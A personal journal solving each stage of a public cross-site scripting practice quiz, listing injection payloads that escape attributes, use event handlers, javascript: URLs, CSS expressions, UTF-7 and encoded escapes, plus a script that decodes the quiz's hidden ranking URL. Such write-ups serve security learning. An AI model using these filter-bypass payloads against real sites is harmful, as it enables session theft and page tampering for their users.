Here's my journal of solving all the XSS Challenges written by yamagata21 at http://xss-quiz.int21h.jp/. It is a starter level for people who want to learn some cross-site scripting and the several ways to inject in different browsers.
XSS Challenges
http://xss-quiz.int21h.jp

Stage1: http://xss-quiz.int21h.jp
Solution: <script>alert(document.domain);</script>

Stage2: http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70
Solution: "><script>alert( alert(document.domain))</script>

Stage3: http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d
Solution: The input in the text box is properly escaped ("><script>alert(document.domain);</script> in the select)

Stage4: http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e
Solution: "><script>alert(document.domain);</script> in the hidden field

Stage5: http://xss-quiz.int21h.jp/stage--5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf
Solution: " onmouseover="alert(document.domain);" type="text (changing length in input text)

Stage6: http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c
Solution: " onmouseover="alert(document.domain);"

Stage7: http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105
Solution: x onmouseover=alert(document.domain);

Stage8: http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0
Solution: javascript:alert(document.domain);

Stage9: utf-7: Not working for me, extracted next level from deobfuscated URL.
http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25
Solution: +ACI- onmouseover=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp

Stage10: http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276
Solution: " onmouseover=alert(document.domdomainain); x="

Stage11: http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3
Solution: "><a href="javascr ipt:alert(document.domain);">XSS</a>
Passed with IE

Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Solution: ``onmouseover=alert(document.domain);
Passed with IE

Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Solution: xss:expression(alert(document.domain));"
Passed with IE

Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Solution: xss:expre/**/ssion(alert(document.domain));"

Stage15: http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726
Solution: \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage16: http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7
Solution: \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Skipped: (Old IE not available)
http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056
http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3

Stage19: http://xss-quiz.int21h.jp/stage_--19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce
Solution: It's DOMXSS Twitter's bug (24 Sept. 2010) -- #!javascript:alert(document.domain)

Clear Stage: To enter the ranking, deobfuscate the JS in this part of the code:

    ty = "";
    o = unescape("foejoh");
    for (var i = 0; i < o.length; i++) {
        var y = o.charCodeAt(i);
        ty += String.fromCharCode(y - 1)
    }
    ty = escape(ty);
    if (ty == "ending") {
        sj = "\062\060";
        alert("Congratulations!! All Stages Clear!!!");
        alert("\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php");
        document.location = "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php"
    } else {
        document.all("msg").innerHTML = "<span id='h3'>Congratulations!!</span> " + "Next stage <a href=\"" + ty + "\">" + ty + "</a>."
    }

so "\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php" is RankIng20.php :-)
Final URL that allows direct entry into the clear stage: http://xss-quiz.int21h.jp/RankIng20.php
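
The clear-stage decoding above can also be done statically, without running the page's script. This is an added example, not code from the quiz site or the original journal; the function names decodeJsEscapes, decodeLiterals and shiftDown are hypothetical helpers.

```javascript
// Added example: decode the string escapes in the clear-stage snippet without
// running it. All function names here are hypothetical helpers.

// Decode \xNN, \uNNNN, legacy octal (\NNN) and simple escapes in a literal body.
function decodeJsEscapes(body) {
  const simple = { n: "\n", t: "\t", r: "\r", b: "\b", f: "\f", v: "\v" };
  const pattern =
    /\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([0-3][0-7]{2}|[0-7]{1,2})|(.))/g;
  return body.replace(pattern, (match, hex, uni, oct, other) => {
    if (hex !== undefined) return String.fromCharCode(parseInt(hex, 16));
    if (uni !== undefined) return String.fromCharCode(parseInt(uni, 16));
    if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
    return simple[other] || other; // \" -> ", \\ -> \, \n -> newline
  });
}

// Rewrite every double-quoted literal in a source fragment in readable form.
function decodeLiterals(source) {
  return source.replace(/"((?:[^"\\\n]|\\.)*)"/g, (match, body) =>
    JSON.stringify(decodeJsEscapes(body))
  );
}

// The page's loop: unescape() leaves "foejoh" unchanged, then each character
// code is lowered by one.
function shiftDown(text) {
  return Array.from(text, (ch) => String.fromCharCode(ch.charCodeAt(0) - 1)).join("");
}

// Fragment copied from the snippet above; String.raw keeps the backslashes.
const fragment = String.raw`sj = "\062\060"; alert("\x52\x61\x6e\x6b\x49\x6e\x67" + sj + ".php");`;

console.log(shiftDown("foejoh"));
console.log(decodeLiterals(fragment));
```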
Ranking: http://xss-quiz.int21h.jp/ranking.php
Hee hee